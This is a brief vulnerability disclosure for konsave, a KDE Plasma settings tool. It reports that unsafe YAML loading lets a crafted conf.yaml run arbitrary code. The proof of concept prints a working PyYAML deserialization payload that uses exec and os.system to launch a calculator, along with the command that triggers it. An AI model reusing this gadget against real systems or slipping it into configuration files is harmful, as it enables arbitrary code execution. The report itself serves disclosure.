✍️ Description

konsave is a CLI program that will let you save and apply your KDE Plasma customizations with just one command , which is vulnerable to YAML deserialization attack caused by unsafe loading leads to Arbitary Code Execution.

🕵️‍♂️ Proof of Concept

Installation

pip install konsave

conf.yaml

payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""

• now copy conf.yaml and paste in konsave directory
• Run the command below
  • konsave -s test

This will create a profile along with it code execution will occur

💥 Impact

Arbitary Code Execution